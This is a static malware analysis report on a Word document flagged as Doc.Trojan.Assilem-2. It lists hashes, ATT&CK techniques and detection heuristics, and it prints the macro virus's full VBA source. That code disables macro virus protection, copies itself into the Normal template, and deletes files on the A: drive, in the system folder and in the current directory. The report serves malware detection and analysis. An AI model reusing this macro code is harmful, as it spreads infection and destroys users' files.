Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ff5b950ea124b9fb…

MALICIOUS

Office (OLE)

49.5 KB Created: 2014-04-10 09:40:00 Authoring application: Microsoft Office Word First seen: 2015-09-27
MD5: a014e4b24fdeef8762da915a3bcc38a0 SHA-1: 8933a694ec106e77362508ccb8703d93848678a0 SHA-256: ff5b950ea124b9fbdddedbc6772f0f65fba7e0ffe394c776956b00a6fa36fa42
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample contains VBA macros that attempt to disable macro virus protection and replicate themselves to the Normal template, indicating a self-propagation and evasion mechanism. The ClamAV detection name 'Doc.Trojan.Assilem-2' suggests a known malicious document type. The presence of a Document_Open macro and the attempt to disable virus protection are strong indicators of malicious intent, likely to establish persistence or download further payloads.

Heuristics 5

  • ClamAV: Doc.Trojan.Assilem-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Assilem-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        .VirusProtection = False
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3153 bytes
SHA-256: 4b6111e9ad421f515d859e353bf19977f9ac9b897c8ac78a6693b165ed19d404
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "QNC"
Attribute VB_Base = "1Normal.QNC"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'########## QNC in TaiWan 2000.1.1 #############
On Error Resume Next
With ActiveDocument
    .ReadOnlyRecommended = False
End With
With Options
    .BackgroundSave = True
    .AllowFastSave = True
    .SavePropertiesPrompt = False
    .SaveInterval = 1
    .SaveNormalPrompt = False
    .VirusProtection = False
End With
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "QNC" Then
     If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
     Set ToInfect = ADI1
     ADI1.Name = "QNC"
     DoAD = True
End If
If NTI1.Name <> "QNC" Then
     If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
     Set ToInfect = NTI1
     NTI1.Name = "QNC"
     DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
     If DoNT = True Then
          Do While ADI1.CodeModule.Lines(1, 1) = ""
               ADI1.CodeModule.DeleteLines 1
          Loop
          ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
          Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
               ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
               BGN = BGN + 1
          Loop
     End If
If DoAD = True Then
      Do While NTI1.CodeModule.Lines(1, 1) = ""
           NTI1.CodeModule.DeleteLines 1
      Loop
      ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
      Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
           ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
           BGN = BGN + 1
      Loop
End If
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
     ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
     ActiveDocument.Saved = True
End If
CYA:
If CInt(Hour(Now)) >= 17 And CInt(Hour(Now)) <= 23 Then
   On Error Resume Next
   Kill "a:\*.*"
End If
m = CInt(Month(Now))
d = CInt(Day(Now))
If (d = 13) And (m Mod 4 = 0) Then
   On Error Resume Next
   If MsgBox("Fatal Error!Power Off Your Computer Now!!", vbCritical + vbOKCancel, "警告!") = vbCancel Then
     Dim filestring As String
     Dim Dir1, FF
     Dir1 = "c:\windows\system\"
     FF = Dir(Dir1 & "*.*", vbArchive Or vbHidden Or vbSystem Or vbDirectory)
     Do
      If (GetAttr(Dir1 & FF) And vbDirectory) <> vbDirectory Then
       If GetAttr(Dir1 & FF) = vbReadOnly Or vbSystem Or vbHide Then
          SetAttr Dir1 & FF, vbNormal
       End If
       Kill Dir1 & FF
      End If
      FF = Dir
     Loop Until FF = ""
   End If
   Dir1 = CurDir()
   If Right(Dir1, 1) <> "\" Then Dir1 = Dir1 & "\"
   Kill Dir1 & "*.*"
End If
End Sub